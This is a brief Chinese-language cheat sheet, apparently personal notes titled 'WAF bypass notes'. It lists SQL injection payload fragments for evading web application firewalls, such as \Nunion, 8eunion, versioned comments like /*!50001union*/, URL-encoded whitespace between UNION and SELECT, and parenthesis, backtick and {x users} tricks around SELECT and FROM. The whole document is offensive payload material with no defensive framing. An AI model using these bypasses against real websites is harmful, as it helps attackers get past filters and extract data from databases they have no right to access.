WAF绕过笔记

整理的一些笔记
1.参数和union之间

select * from users where id=\Nunion select 1,2,3;
1.1union
8eunion
/*!50001union*/

2.union和select之间
空白符 %09 %0c %0a %0b %0c %0d %a0

union(select)

3.select和from之间

select(1)(2)(3)from
select-1 from
select+1 from
select~1
select!1
select@`id`
/*!50001select*/
select'☺',-2,'3'from
select"☺"

4.select from 之后

from`users`
/*!50001from*/
 from{x users}

`